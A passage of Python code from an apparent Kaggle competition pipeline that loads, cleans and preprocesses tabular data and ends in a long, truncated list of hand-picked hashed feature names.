'{}non_zero_log_gmean'.format(prefix)] = \ geo_mean_overflow(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_skewness'.format(prefix)] = \ skew(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_kurtosis'.format(prefix)] = \ kurtosis(np.log1p(non_zero_values)) agg_df.at[index, '{}_non_zero_count'.format( prefix)] = np.count_nonzero(~np.isnan(non_zero_values)) agg_df.at[index, '{}_non_zero_fraction'.format(prefix)] = \ np.count_nonzero(~np.isnan(non_zero_values)) / \ np.count_nonzero(~np.isnan(row)) return agg_df def find_fillers(df): '''Find the filler values in cols''' u, c = np.unique(df.loc['6726fff18', :].values, return_counts=True) arg = np.argsort(c)[::-1] fillers = u[arg] return fillers class KaggleDataset(): '''Class used to load Kaggle's official datasets''' def __init__(self, train_path, test_path=None, join_dfs=False, verbose=True): self.train_path = train_path self.test_path = test_path self.verbose = verbose # Default settings, to be overidden if required self.normalize = False self.use_aggregates = False self.reduce_dim_nb = 0 self.reduce_dim_method = 'svd' self.scaler = MaxAbsScaler(copy=False) # Load datasets self.train_df = load_df_from_path(self.train_path) # self.train_df[self.train_df == 1563411.76] = 0 if test_path is not None: self.test_df = load_df_from_path(self.test_path) else: self.test_df = None # If joint_dfs, all dfs are joint in a single joint_df if join_dfs: self.joint_df = pd.concat([self.train_df, self.test_df], axis=0) # Create aggregates dfs self.train_agg = pd.DataFrame(index=self.train_df.index) if test_path is not None: self.test_agg = pd.DataFrame(index=self.test_df.index) def remove_fillers_from_data(self, dataset='both', n_fillers=47): '''Substitute filler values in dataset for 0''' fillers = find_fillers(self.train_df)[:n_fillers] print(fillers) target = self.train_df['target'] for filler in fillers: if dataset == 'test' or dataset == 'both': self.test_df[self.test_df == filler] = 0 if dataset == 'train' or dataset == 'both': self.train_df[self.train_df == filler] = 0 self.train_df['target'] = target def get_train_data(self, logloss=True, round_targets=False, normalize=False, n_components=None, reduce_dim_nb=0, use_aggregates=True, get_leaky_data=None, reduce_dim_method='svd'): '''Convert train_df to train array''' # Save settings to proccess test data later on self.normalize = normalize self.reduce_dim_nb = reduce_dim_nb self.reduce_dim_method = reduce_dim_method self.use_aggregates = use_aggregates # Get trainning data and labels from dataframe x = self.train_df.drop(["target"], axis=1).values if logloss: y = np.log1p(self.train_df["target"].values) else: y = self.train_df["target"].values if round_targets: y = np.around(y, decimals=round_targets) # Preprocess if required if normalize: x = self.normalize_data(x, fit=True, verbose=self.verbose) if reduce_dim_nb or n_components is not None: x = self.reduce_dimensionality('train', n_components=n_components, red_num=reduce_dim_nb, method=reduce_dim_method, verbose=self.verbose) # Compute aggregates if required if use_aggregates: x = np.concatenate([x, self.train_agg.values], axis=-1) # Get leaky rows for training if get_leaky_data is not None: x_lk, y_lk = self.get_validation_set_from_leaky_test( get_leaky_data, logloss=logloss) x = np.concatenate([x, x_lk], axis=0) y = np.concatenate([y, y_lk], axis=0) return x, y def get_test_data(self): '''Convert test_df to array using the same preprocess as trainning data''' x = self.test_df.values # Preprocess if required if self.normalize: x = self.normalize_data(x, fit=False, verbose=self.verbose) if self.reduce_dim_nb: x = self.reduce_dimensionality('test', self.reduce_dim_nb, method=self.reduce_dim_method, fit=False, verbose=self.verbose) # Compute aggregates if required if self.use_aggregates: x = np.concatenate([x, self.test_agg.values], axis=-1) return x def get_aggregates_as_data(self, dataset, logloss=True, round_targets=False): '''Get aggregates as np data''' if dataset == 'train': x = self.train_agg.values if logloss: y = np.log1p(self.train_df["target"].values) else: y = self.train_df["target"].values if round_targets: y = np.around(y, decimals=round_targets) return x, y elif dataset == 'test': x = self.test_agg.values return x def remove_constant_features(self, verbose=True): '''Remove features that are constant for all train set entries''' col_list = [] count = 0 for col in self.train_df.columns: if col != 'ID' and col != 'target': if self.train_df[col].std() == 0: col_list.append(col) count += 1 # Remove feature in both train and test sets self.train_df.drop(col_list, axis=1, inplace=True) if self.test_df is not None: self.test_df.drop(col_list, axis=1, inplace=True) if verbose: print('{} constant features removed from datasets'.format(count)) def remove_duplicated_features(self, verbose=True): '''Remove features that have duplicated values''' colsToRemove = [] columns = self.train_df.columns for i in range(len(columns) - 1): v = self.train_df[columns[i]].values for j in range(i + 1, len(columns)): if np.array_equal(v, self.train_df[columns[j]].values): colsToRemove.append(columns[j]) # Remove feature in both train and test sets self.train_df.drop(colsToRemove, axis=1, inplace=True) if self.test_df is not None: self.test_df.drop(colsToRemove, axis=1, inplace=True) if verbose: print('{} duplicated features removed from datasets'.format( len(colsToRemove))) def remove_different_distribution_features(self, pvalue_threshold=0.01, stat_threshold=0.2, verbose=True): '''Remove features that have different distribuition in train and test sets''' diff_cols = [] for col in self.train_df.drop(["target"], axis=1).columns: statistic, pvalue = ks_2samp( self.train_df[col].values, self.test_df[col].values) if pvalue <= pvalue_threshold and \ np.abs(statistic) > stat_threshold: diff_cols.append(col) for col in diff_cols: if col in self.train_df.columns: self.train_df.drop(col, axis=1, inplace=True) self.test_df.drop(col, axis=1, inplace=True) if verbose: print('{} features removed.'.format(len(diff_cols))) def keep_only_selected_features(self, dataset='both', return_only=False): '''Remove all columns except for the hand picked ones''' features = ['f190486d6', '58e2e02e6', 'eeb9cd3aa', '9fd594eec', '6eef030c1', '15ace8c9f', 'fb0f5dbfe', '58e056e12', '20aa07010', '024c577b9', 'd6bb78916', 'b43a7cfd5', '58232a6fb', '1702b5bf0', '324921c7b', '62e59a501', '2ec5b290f', '241f0f867', 'fb49e4212', '66ace2992', 'f74e8f13d', '5c6487af1', '963a49cdc', '26fc93eb7', '1931ccfdd', '703885424', '70feb1494', '491b9ee45', '23310aa6f', 'e176a204a', '6619d81fc', '1db387535', 'fc99f9426', '91f701ba2', '0572565c2', '190db8488', 'adb64ff71', 'c47340d97', 'c5a231d81', '0ff32eb98', '06148867b', '4ec3bfda8', 'a9ca6c2f4', 'bb0408d98', '1010d7174', 'f8a437c00', '74a7b9e4a', 'cfd55f2b6', '632fed345', '518b5da24', '60a5b79e4', '3fa0b1c53', 'e769ee40d', '9f5f58e61', '83e3e2e60', '77fa93749', '3c9db4778', '42ed6824a', '761b8e0ec', 'ee7fb1067', '71f5ab59f', '177993dc6', '07df9f30c', 'b1c5346c4', '9a5cd5171', 'b5df42e10', 'c91a4f722', 'd93058147', '20a325694', 'f5e0f4a16', '5edd220bc', 'c901e7df1', 'b02dfb243', 'bca395b73', '1791b43b0', 'f04f0582d', 'e585cbf20', '03055cc36', 'd7f15a3ad', 'ccd9fc164', '0d7692145', '62071f7bc', 'ab515bdeb', 'c30c6c467', 'eab76d815', 'b6ee6dae6', '49063a8ed', '4cb2946ce', '6c27de664', '772288e75', 'afd87035a', '44f2f419e', '754ace754', 'e803a2db0', 'c70f77ef2', '65119177e', '3a66c353a', '4c7768bff', '9e4765450', '24141fd90', 'dc8b7d0a8', 'ba499c6d9', '8b1379b36', '5a3e3608f', '3be3c049e', 'a0a3c0f1b', '4d2ca4d52', '457bd191d', '6620268ab', '9ad654461', '1a1962b67', '7f55b577c', '989d6e0f5', 'bc937f79a', 'e059a8594', '3b74ac37b', '555265925', 'aa37f9855', '32c8b9100', 'e71a0278c', '0f8d7b98e', 'c30ff7f31', 'ac0e2ebd0', '24b2da056', 'bd308fe52', '476d95ef1', '202acf9bd', 'dbc0c19ec', '06be6c2bb', 'd8296080a', 'f977e99dc', '2191d0a24', '7db1be063', '1bc285a83', '9a3a1d59b', 'c4d657c5b', 'a029667de', '21bd61954', '16bf5a9a2', '0e0f8504b', '5910a3154', 'ba852cc7a', '685059fcd', '21d6a4979', '78947b2ad', '1435ecf6b', '3839f8553', 'e9b5b8919', 'fa1dd6e8c', '632586103', 'f016fd549', 'c25ea08ba', '7da54106c', 'b612f9b7e', 'e7c0a50e8', '29181e29a', '395dbfdac', '1beb0ce65', '04dc93c58', '733b3dc47', '1847c8140', '4adae02ea', '06f44eb79', '63dfd4552', '2a1f6c7f9', 'b3655056c', '7a5460b56', '8909db7d5', 'b0e2acd8e', '7cb53a29a', '5d5c5ce6d', 'a5874086d', '281c556a6', '04fe69e6a', 'e421c414e', '87e6b35f2', '1de239e78', 'c65451871', 'b136976cc', 'baa676f41', '82f194d54', 'f3b9c0b95', '2a83c3267', '802ee804e', '99b88d0fd', 'a257e4bb9', '741684fb0', 'fae0ce474', '16d7bff2b', '0d6d7ec0b', 'bdadd6c34', 'b6623bacf', 'a77b4afa4', '03490ef8c', 'f0aec6c6b', '7b6e769e4', 'ce6349807', '1602cb35d', '279d380ce', '63895c382', '18cad608c', '05f1b68b8', '9e0c57b34', '414b74eaa', '3b6f67b0e', '372daeab0', 'ec827621a', '44d132265', '850d3a6f5', '440d789c5', 'e9c45d66f', '615cc4c17', 'ca04a07ca', '4685cc47b', '6cf9184bb', '3dc46e323', '0106dd950', '3855aef1e', 'c9eda7d9c', 'ac308c9a3', '964cd68bc', 'f23b7530c', '7250feb72', '6809065b9', 'c7fd9abc6', '06a1c3b47', '39896d3dd', '10f17bd3e', '6984f4045', 'ed8ff54b5', '42b407f0d', '5509e2e98', 'c593d73e8', 'd3245937e', 'cbeddb751', '0f81cc1d2', '22b3971f5', 'ff3ebf76b', '76a75bd91', '258412544', '1ad24da13', '8c5025c23', 'f52a82e7f', 'c0b22b847', 'd75793f21', '4cffe31c7', '6c2d09fb1', 'fb42abc0d', '206ba1242', '62f61f246', '1389b944a', 'd15e80536', 'fa5044e9e', 'a0b0a7dbf', '1ff6be905', '4e06c5c6d', '1835531cd', '68b647452', 'c108dbb04', '58e8e2c82', 'f3bfa96d5', 'f2db09ac3', '4e8196700', '8cd9be80e', '83fc7f74c', 'dbc48d37c', '2028e022d', '17e160597', 'eb8cbd733', 'addb3f3eb', '460744630', '9108ee25c', 'b7950e538', 'a7da4f282', '7f0d863ba', 'b7492e4eb', '24c41bd80', 'fd7b0fc29', '621f71db3', '26f222d6d', '1d9078f84', '64e483341', 'a75d400b8', '4fe8154c8', '29ab304b9', '20604ed8f', 'bd8f989f1', 'c1b9f4e76', '4824c1e90', '4ead853dc', 'b599b0064', 'd26279f1a', '58ed8fb53', 'ff65215db', '402bb0761', '74d7998d4', 'c7775aabf', '9884166a7', 'beb7f98fd', 'fd99c18b5', 'd83a2b684', '18c35d2ea', '0c8063d63', '400e9303d', 'c976a87ad', '8a088af55', '5f341a818', '5dca793da', 'db147ffca', '762cbd0ab', 'fb5a3097e', '8c0a1fa32', '01005e5de', '47cd6e6e4', 'f58fb412c', 'a1db86e3b', '50e4f96cf', 'f514fdb2e', '7a7da3079', 'bb1113dbb', '20868afc1', 'a46587cda', 'acdef5318', 'a72fcabd8', '21216a0a8', 'dd16bb1ff', '3b8208d28', 'a8c320153', '4a6f8b2c1', 'ac2392a17', '08565b519', '6035df6d8', '4b2316bd5', 'bc3f77679', '51ebff825', '43727fb35', 'c0d363088', 'fd1187d68', '207871d87', '7e0fd6d92', 'f4e243e21', '037a54e89', 'cfa24e4be', 'd7f1f9e52', '6760927a0', '0d8f892fe', '09e395f05', 'bcc18dd40', '0f5fb7fe7', 'f10717d56', '717039eef', '41fb39de4', '965fa6747', '75e55b7a9', 'ff08cfbbe', '9e88cfd02', 'df3ac443c', '7acda93e6', '62e587225', 'd313c892b', '2135fa05a', 'e8a3423d6', '90a438099', '7ad6b38bd', '60e45b5ee', '2b9b1b4e2', 'd6c82cd68', '923114217', 'b361f589e', '04be96845', 'ee0b53f05', '21467a773', '47665e3ce', 'a6229abfb', '9666bfe76', '7dcc40cda', '17be6c4e7', 'a89ab46bb', '9653c119c', 'cc01687d0', '60e9cc05b', 'ffcec956f', '51c250e53', '7344de401', 'a15b2f707', 'a8e607456', 'dbb8e3055', '2a933bcb8', 'b77bc4dac', '58d9f565a', '17068424d', '7453eb289', '027a2206a', '343042ed9', 'c8fb3c2d8', '29eddc376', '1c873e4a6', '588106548', '282cfe2ad', '358dc07d0', '266525925', '4b6dfc880', '2cff4bf0c', 'a3382e205', '6488c8200', '547d3135b', 'b46191036', '453128993', '2599a7eb7', '2fc60d4d9', '009319104', 'de14e7687', 'aa31dd768', '2b54cddfd', 'a67d02050', '37aab1168', '939cc02f5', '31f72667c', '6f951302c', '54723be01', '4681de4fd', '8bd53906a', '435f27009', 'f82167572', 'd428161d9', '9015ac21d', 'ec4dc7883', '22c7b00ef', 'd4cc42c3d', '1351bf96e', '1e8801477', 'b7d59d3b5', 'a459b5f7d', '580f5ff06', '39b3c553a', '1eec37deb', '692c44993', 'ce8ce671e', '88ef1d9a8', 'bf042d928', '2d60e2f7a', '11ad148bd', '54d3e247f', 'c25438f10', 'e6efe84eb', '964037597', '0196d5172', '47a8de42e', '6f460d92f', '0656586a4', '22eb11620', 'c3825b569', '6aa919e2e', '086328cc6', '9a33c5c8a', 'f9c3438ef', 'c09edaf01', '85da130e3', '2f09a1edb', '76d34bbee', '04466547a', '3b52c73f5', '1cfb3f891', '704d68890', 'f45dd927f', 'aba01a001', 'c9160c30b', '6a34d32d6', '3e3438f04', '038cca913', '504c22218', '56c679323', '002d634dc', '1938873fd', 'd37030d36', '162989a6d', 'e4dbe4822', 'ad13147bd', '4f45e06b3', 'ba480f343', '32313055b', '1cec80910', 'd5de50af2', 'd08c4204c', 'dbf75ea9f', 'b93c33953', '425c08bf3', '015c3e354', '26419fa97', '0b9a18ebf', 'bbd7e6282', '6fec5a793', 'e4eac6fc5', '99ea04b86', '24292d615', '72ad5471c', '2f489369f', '35d9497eb', '42d321127', '48aa6d627', '94516b63e', '55d7eb6d2', '8dbd95b8d', '1d2df346e', '181e91b1c', '4a29bc92b', '0f14ab429', '22b3a9853', 'defcc2c50', '6a9e2b09d', '42b795e64', 'b65627fab', '7af2b8f44', '1ce5f7bde', 'dd2fc85d7', '013127235', '916d17652', 'a697e9248', '24addf864', 'a63aaf7cc', '3391c0af1', 'd8e951a15', '320c3880a', '37bd241bb', 'ef6fab1bc', '39d765b49', 'c0f2800fc', '9401c82a9', '6f9d256a9', 'f967f827b', '798a8e92e', '1e991f09b', '77854931e', '0024cd760', 'ab7b12083', '7b8ac394f', 'd8aa77bcc', '54b3d6afc', '4c6a1accd', '0a7ef2f9b', 'dc3b4460b', '83ce5d80d', '7e293fbaf', '8d468092c', 'dc0118d47', '9f8df01bd', '3f02111a8', 'bf0195c11', '28bc37378', '05410a84f', 'ecdc88e4b', '8d9263a24', '3391c0af1', 'd8e951a15', '320c3880a', '37bd241bb', 'ef6fab1bc', '39d765b49', 'c0f2800fc', '9401c82a9', '6f9d256a9', 'f967f827b', '798a8e92e', '1e991f09b', '77854931e', '0024cd760', 'ab7b12083', '7b8ac394f', 'd8aa77bcc', '54b3d6afc', '4c6a1accd', '0a7ef2f9b', 'dc3b4460b', '83ce5d80d', '7e293fbaf', '8d468092c', 'dc0118d47', '9f8df01bd', '3f02111a8', 'bf0195c11', '28bc37378', '05410a84f', 'ecdc88e4b', '8d9263a24', 'e234cdc9b', '380d54fad', '7f17e0b2a', '03e726456', '8f66157e3', '556fb6bc0', '2d2114d9b', '215ffb087', '3b843ae7e', 'c8438b12d', 'd1b9fc443', '19a45192a', '63509764f', '6b6cd5719', 'b219e3635', '4b1d463d7', '4baa9ff99', 'b0868a049', '3e3ea106e', '043e4971a', 'a2e5adf89', '25e2bcb45', '3ac0589c3', '413bbe772', 'e23508558', 'c1543c985', '2dfea2ff3', '9dcdc2e63', '1f1f641f1', '75795ea0a', 'dff08f7d5', '914d2a395', '00302fe51', 'c0032d792', '9d709da93', 'cb72c1f0b', '5cf7ac69f', '6b1da7278', '47b5abbd6', '26163ffe1', '902c5cd15', '45bc3b302', '5c208a931', 'e88913510', 'e1d6a5347', '38ec5d3bb', 'e3d64fcd7', '199d30938', '4302b67ec', '75b663d7d', 'fc4a873e0', '1e9bdf471', '86875d9b0', '8f76eb6e5', '3d71c02f0', '05c9b6799', '26df61cc3', '27a7cc0ca', '9ff21281c', '3ce93a21b', '9f85ae566', '3eefaafea', 'afe8cb696', '72f9c4f40', 'be4729cb7', '8c94b6675', 'ae806420c', '63f493dba', '5374a601b', '5291be544', 'acff85649', '3690f6c26', '26c68cede', '12a00890f', 'dd84964c8', 'a208e54c7', 'fb06e8833', '7de39a7eb', '5fe3acd24', 'e53805953', '3de2a9e0d', '2954498ae', '6c3d38537', '86323e98a', 'b719c867c', '1f8a823f2', '9cc5d1d8f', 'd3fbad629', '44df9c106', 'c768b2fbd', 'ca667c723', '1a9b9e2fe', 'e3a41c199', '1529e64f6', '2af3668d1', '85505df26', 'b488b6a67', '4e593c1c5', '47aab5d12', 'b0c596a35', '2127bb611', 'c8c4ef2e5', '665493ecc', '235163358', '932d0f56b', '9ce50845b', 'aca96197c', '74fa547c6', 'b6636b458', '95bbebdd4', 'de0aaf6f4', '7106396d7', 'fb2ab1513', '346c04a64', '5271beb00', 'e8b599c85', 'de5e5b296', '90e069c70', 'a939664aa', 'e8f43b3ab', 'df5f5272a', 'df3cf10bd', '71659d45d', '03b8b1f2d', '860a95ef6', '7f174450b', 'bbbff9657', '1d9b78b9c', '4569d5378', '22f05c895', '5fad07863', 'f32763afc', '9bb02469c', '61063fa1c', '4a93ad962', 'fa1efdadd', '4ef309fc3', 'ed0860a34', '6ae0787f3', 'ffd50f0bf', '704e2dc55', '1b1a893f5', 'b19e65a65', '8d4b52f9a', '85dcc913d', '92ba988e1', '6d46740f1', '0aab2f918', '6610f90f1', 'a235f5488', 'c5c073bb0', '13f7f9c70', 'fb6da0420', '73361d959', '783ee6e9a', '635fbbd2c', '60cd556c9', '150504397', 'f3b6dabf7', 'd92ea0b2a', 'b904b8345', '78bc2558b', '4e1a8f6eb', 'c89ae4ce0', 'f2af9300f', 'ca25aad9f', '9d435a85b', '8d035d41e', '48b839509', '2b8851e90', '28f75e1a5', '0e3ef9e8f', '37ac53919', '7ca10e94b', '4b6c549b1', '467aa29ce', '74c5d55dc', '0700acbe1', '44f3640e4', 'e431708ff', '097836097', 'd1fd0b9c2', 'a0453715a', '9e3aea49a', '899dbe405', '525635722', '87a2d8324', 'faf024fa9', 'd421e03fd', '1254b628a', 'a19b05919', '34a4338bc', '08e89cc54', 'a29c9f491', 'a0a8005ca', '62ea662e7', '5fe6867a4', '8b710e161', '7ab926448', 'd04e16aed', '4e5da0e96', 'ff2c9aa8f', 'b625fe55a', '7124d86d9', '215c4d496', 'b6fa5a5fd', '55a7e0643', '0a26a3cfe', '5030aed26', 'b850c3e18', '212efda42', '9e7c6b515', '2d065b147', '49ca7ff2e', '37c85a274', 'ea5ed6ff7', 'deabe0f4c', 'bae4f747c', 'ca96df1db', '05b0f3e9a', 'eb19e8d63', '235b8beac', '85fe78c6c', 'cc507de6c', 'e0bb9cf0b', '80b14398e', '9ca0eee11', '4933f2e67', 'fe33df1c4', 'e03733f56', '1d00f511a', 'e62cdafcf', '3aad48cda', 'd36ded502', '92b13ebba', 'f30ee55dd', '1f8754c4e', 'db043a30f', 'e75cfcc64', '5d8a55e6d', '6e29e9500', 'c5aa7c575', 'c2cabb902', 'd251ee3b4', '73700eaa4', '8ab6f5695', '54b1c1bc0', 'cbd0256fb', '50603ae3d', '48282f315', '090dfb7e2', '6ccaaf2d7', '1bf2dfd4a', '50b1dd40f', '1604c0735', 'e94c03517', 'f9378f7ef', '65266ad22', 'ac61229b6', 'f5723deba', '1ced7f0b4', 'b9a4f06cd', '8132d18b8', 'df28ac53d', 'ae825156f', '936dc3bc4', '5b233cf72', '95a2e29fc', '882a3da34', '2cb4d123e', '0e1921717', 'c83d6b24d', '90a2428a5', '67e6c62b9', '320931ca8', '900045349', 'bf89fac56', 'da3b0b5bb', 'f06078487', '56896bb36', 'a79522786', '71c2f04c9', '1af96abeb', '4b1a994cc', 'dee843499', '645b47cde', 'a8e15505d', 'cc9c2fc87', '509e911f0', '9c36a77b3', '50aaba7f1', 'ed5af35f0', 'ffd2f9409', 'd6a122efd', '30768bc79', '9161061c9', '1fbbd4edf', '9a179ed71', '6a055c4fb', '61efa1e29', 'e171bccbe', 'd7cdd8aef', 'd168174c7', 'b791ce9aa', '1a82869a6', '3696a15a7', '7b31055f1', 'a76ad8513', '82ba7a053', '37426563f', 'ba5bbaffc', 'd3022e2f1', '0ccd5ff1c', '31a3f920c', '86eb6ec85', '38df6c628', 'f1fbe249b', '6d0d72180', '22dbe574a', '5860d7fa9', '455f29419', 'f269ec9c8', '75aad4520', '18c0b76e9', 'dae4d14b4', '0cad4d7af', '1e1cb47f3', '9d6410ef5', '51c141e64', '0e348d340', '64e010722', '55a763d90', '13b54db14', '01fdd93d3', '1ec48dbe9', 'cf3841208', 'd208491c8', '90b0ed912', '633e0d42e', '9236f7b22', '0824edecb', '71deb9468', '1b55f7f4d', '377a76530', 'c47821260', 'bf45d326d', '69f20fee2', 'd6d63dd07', '5ab3be3e1', '93a31829f', '121d8697e', 'f308f8d9d', '0e44d3981', 'ecdef52b2', 'c69492ae6', '58939b6cc', '3132de0a3', 'a175a9aa4', '7166e3770', 'abbde281d', '23bedadb2', 'd4029c010', 'fd99222ee', 'bd16de4ba', 'fb32c00dc', '12336717c', '2ea42a33b', '50108b5b5', '53aa182a2', '4e92107c6', '295408598', 'b76bf3f19', '3305c8063', 'd3a116347', 'ac5260727', '199caef5d', '97ea72529', '1d4d5cd4a', '8fc7efaf0', '225fa9d61', '94f3dcaee', '4634c8fae', '660fdbc58', '052f633c1', '657dec16b', '7fa5bc19f', '7207afb67', 'cda277b2a', 'e9a473fbb', '3eac9a76e', '1c554649c', '86ffb104c', 'b14d5014b', '8348ea8d3', 'e3a4596f9', '49db469f5', 'f928893ca', 'aa610feec', 'fa2a340da', '652142369', '53aa182a2', '4e92107c6', '295408598', 'b76bf3f19', '3305c8063', 'd3a116347', 'ac5260727', '199caef5d', '97ea72529', '1d4d5cd4a', '8fc7efaf0', '225fa9d61', '94f3dcaee', '4634c8fae', '660fdbc58', '052f633c1', '657dec16b', '7fa5bc19f', '7207afb67', 'cda277b2a', 'e9a473fbb', '3eac9a76e', '1c554649c', '86ffb104c', 'b14d5014b', '8348ea8d3', 'e3a4596f9', '49db469f5', 'f928893ca', 'aa610feec', 'fa2a340da', '652142369', 'f81908ca5', '947c7c3e8', '8160230fd', 'c2d200f0e', 'c99902a93', 'd3a6362c5', '3ee95e3ef', '7f8027faf', '55e30b08f', '24fef0850', '1ac1a10d6', '29c64fa08', '82e9efdd8', 'befe0f9c4', '4f0d3819a', '849c542c3', '4f325b517', '57e01acca', '54481feaa', '3ebf86dd5', '849c464e7', '248db7ce7', '82c164590', '7fd7c9eae', '9fe78f046', 'e92c373a6', 'abace6b29', 'd6be59f6a', '2d1dd55ed', '9a9b4a012', '0ae364eb9', 'db1b70fc8', '916ac9986', '545d84e13', '049e4daae', '95837bbfb', '9b8eff1d7', '17a6e2978', 'b7ae337fe', '256f1449f', '89a26cda9', '1930cefda', '42451bcbf', '722a0187a', '5a86cabd0', 'e14727834', '21a3176c5', '16bf8b4ec', '5b465f819', 'a2aa0e4e9', '944e05d50', '4f8b27b6b', 'a498f253f', 'c73c31769', '025dea3b3', '616c01612', 'f3316966c', '83ea288de', '2dbeac1de', '47b7b878f', 'b4d41b335', '686d60d8a', '6dcd9e752', '7210546b2', '78edb3f13', '7f9d59cb3', '30992dccd', '26144d11f', 'a970277f9', '0aea1fd67', 'dc528471e', 'd51d10e38', 'efa99ed98', '48420ad48', '7f38dafa6', '1af4ab267', '3a13ed79a', '73445227e', '971631b2d', '57c4c03f6', '7f91dc936', '0784536d6', 'c3c3f66ff', '052a76b0f', 'ffb34b926', '9d4f88c7b', '442b180b6', '948e00a8d', '5bc10886b', '292471107', 'fe919be32', 'b1a7086ac', '88f64cd8b', '00c467392', 'e24e3b26d', '42ebbcafa', 'ee7c4db36', 'b5c9b4e39', 'adc894423', '9ba5eb33d', 'd0631e6c0', 'c611e1778', '2947535d9', 'ef2056ce5', '79af1068d', '098913433', 'dcf8a669f', 'ce0ee5a89', 'f6a05ad95', '831a9e087', '572f63ba5', '8fc5f0637', 'fb36b89d9', '0926408ae', '63688d3df', '9ddb5842c', '2ea3f3caf', '32ebdadbc', '92fd74409', 'b8fde5765', '2c97120d8', '44146018f', '67b44278a', '8afae1db8', 'fd5c6c5aa', 'b04bab75e', '9ee0b383b', '77f5250e3', '5bf913a56', 'e6c050854', 'edc3f10a1', '3607eabff', '5cec9a2fc', '68153d35e', '193b90919', '5bca7197d', 'da2a2f42d', '0f2b86f4a', '280898a2f', '1c6c0ffb1', 'ec2a9147d', '1ba077222', 'f115e74c0', '34b2a678e', 'cc0045289', 'c00356999', '09184c121', '799625b2f', '5b714cd7a', 'd14ac08a8', '5ef415428', 'f51378159', 'd5dcaa04a', 'e8522c145', '7610d0f28', '20ff37b40', '5b9e32dbe', 'dd84674d0', '587a5d8c3', '2c1ed7d88', '86f0ede14', '05e427fe8', '45226872a', '003da5628', 'fbbd5f5ae', 'a8b6710d0', '99197edf2', 'a1995906f', '63be1f619', '36a56d23e', '9e2040e5b', 'a00a63886', '4edc3388d', '5f11fbe33', '26e998afd', 'f7faf2d9f', '992b5c34d', 'f7f553aea', '7e1c4f651', 'f5538ee5c', '711c20509', '55338de22', '374b83757', 'f41f0eb2f', 'bf10af17e', 'e2979b858', 'd3ed79990', 'fe0c81eff', '5c0df6ac5', '82775fc92', 'f1c20e3ef', 'fa9d6b9e5', 'a8b590c6e', 'b5c4708ad', 'c9aaf844f', 'fe3fe2667', '50a6c6789', '8761d9bb0', 'b6403de0b', '2b6f74f09', '5755fe831', '91ace30bd', '84067cfe0', '15e4e8ee5', 'd01cc5805', '870e70063', '2bd16b689', '8895ea516', '6469d38ef', '22ff4e1b8', 'cf4a89033', '2d7f256c6', 'e98dd91da', 'bce33962d', 'cdaf3e576', '78b2cf944', 'b3dbb1222', 'a2d707f4e', 'a5565ec7d', '26b423c42', '2731a96a2', 'c24634d56', 'dc61677e5', '62c319fd1', 'fbe583de5', 'ab7534e84', '92eb376f1', '7def2d7d3', '657d07d19', 'df08959aa', '48130b04b', 'e0cad27c5', '0b139c060', '99df18cb2', '32c6f9aa6', '7ff7d351b', 'e49fea26e', '403e7e48d', '2c5809e51', 'fe1160758', 'd83991b80', 'ce999e374', '29e58696d', '212226b7b', '950b9cf2d', 'adc70e02f', '7792cebe0', '22f0deffc', '65ee014d6', '5c613c9de', '88263a031', '0e72651fe', 'ed76b9206', '884ec1cca', 'c05e7f369', '736e55e5f', '64d91247f', 'be8a71172', '88204c8b7', '5522157d7', '7b922ea8b', '5d900b8ce', '36af55ef1', 'f3e544d66', '12adc9937', '78a879b5d', '63f291ac1', '3e568d6c3', '1413972fe', '5f6ea2fa9', '46e10e042', '982210169', 'a6e843cff', 'dd80d36d7', 'c5e748f6a', 'c1ad8b95a', '8e7a80f64', '533d88707', '69e1143e2', '2cbced573', '4810efa27', '91d95575e', '55c3e1c4e', 'da1d826f5', '92f32943a', '46291c5d1', '9789dc806', 'b266d28ce', '6cf7644e0', 'c0004231c', '25968f96e', 'fb8395d97', 'ee9e70298', 'e662f1672', 'eda856f5f', '49f11e712', '43dc0f90c', '11d9e8383', '0738fe5ff', '3268914c7', '08d17e384', '1a67a2101', '406a11b5a', 'e2e6f1d23', '2862eec4f', '9c6bf2983', '0a4e510ee', '14d2c6d95', '0a03426de', '82ade3db6', '8909b68e1', 'aaed60a3d', '879e1f51a', '5cbf1b3ea', '1ecddbaa0', 'b96718230', 'bd550871c', 'c55eb4392', '0743b9c08', '5580c77b0', '25613ca0a', 'de66047b0', '2322dbbbb', '760ef38f1', 'da5c36eee', '2de811f82', 'a760e7f65', '5d8a2a27d', '6e00fdaad', 'e0f6a993a', '17e2a7989', '38f5efd6d', 'ce3c09a74', 'a6182b737', '1a44834bf', '940151347', 'dee882846', '034bec11b', '11b0ebe2a', '0db69e82d', '2c338b4d6', 'f34f48706', 'ea397d576', 'ca6c23686', '371ff7a11', 'cb162bd89', '2e762ec53', '1d79bc053', '912f4f5de', 'a25bc2d4a', 'c16a7d537', '268040457', '45cda25bb', '506e25985', 'f62b69c09', 'a8ef2a0d2', '67f9e982f', '0f49e0f05', '85f50c67d', 'c959d372a', '89db78d8e', '94f26b213', '13d853d22', '7bf58da23', '3377a30e2', '357a1f6b5', '19f721ba0', '83e2ae51c', '75d240f7b', '376474413', '0892b3439', '4bf2b8e7c', 'f8de3e357', '4d9538272', '50a900e26', 'ca4eab5c5', '8c564ae48', '16a9296fd', '9bed59a71', '683d89bf1', '736fce873', '60b76e463', '6a3b5a968', '890163e1a', '2c136905e', '08d203407', '08af3dd45', 'fbe52b1b2', 'e2b4d4ef7', '78c239acf', '3da2882fd', '10596ddee', '2135da74a', '3e0e55648', 'acee6ff41', '93c1eecb4', 'b6e38a517', 'e9c7ccc05', '2bf7dc91d', '06b19b6c4', 'b0e45a9f7', 'fd206ec4d', 'c63090352', 'df1ed6b50', '28dc3cc44', '7b1ddbabf', '5a88e3d89', 'f2520b601', '7ba58c14d', '1fe02bc17', '4672a8299', '8794c72c8', 'cca45417f', '55dbd6bcb', 'e6e2c3779', '3cae817df', '973663d14', 'e8dfb33d5', '9281abeea', '11c01e052', '1520de553', 'edddb1ba5', 'c18b41ac3', '00e87edf2', 'ae72cba0a', 'eb4f2651e', '300398f1c', '6c05550b8', '9b26736c3', '24744410a', '26faf1b2e', '44f09b92d', '19975f6ff', '1bf6240eb', 'e438105db', 'cdc36a26a', '087e01c14', '828b327a6', 'cc62f0df8', '9370aa48d', 'd4815c074', '18321c252', '22fbf6997', 'feed9d437', 'f6c9661fc', '55f2b3d34', '69fe81b64', '1074273db', '7f72c937f', '79e55ef6c', '408d86ce9', '7a1e99f69', '736513d36', '0f07e3775', 'eb5a2cc20', '2b0fc604a', 'aecd09bf5', '91de54e0a', '66891582e', 